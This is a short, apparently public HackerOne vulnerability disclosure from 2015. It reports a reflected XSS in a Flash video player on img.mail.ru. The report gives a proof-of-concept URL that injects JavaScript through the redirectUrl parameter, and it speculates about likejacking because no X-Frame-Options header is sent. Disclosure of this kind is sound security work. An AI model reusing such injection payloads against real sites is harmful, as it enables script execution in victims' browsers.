Mail.ru: Flash XSS on img.mail.ru

2015-04-28T13:41:45
ID H1:58831
Type hackerone
Reporter tunnelshade
Modified 2015-10-30T12:22:06

Description

Vulnerable Flash File: http://img.mail.ru/r/video2/player_v2.swf

Steps:
+ Open http://img.mail.ru/r/video2/player_v2.swf?metadataUrl=http://videoapi.my.mail.ru/videos//community/mir/_groupvideo/921.json&redirectUrl=\%22));alert(document.domain);}catch(e){}//
+ Click on social share and click on anything (e.g. twitter)

Severity:
+ XSS on
+ There is an ActionScript function ApplicationController.like bound to JavaScript using ExternalInterface. So, I suspect that likejacking is possible since img.mail.ru doesn't send X-Frame-Options.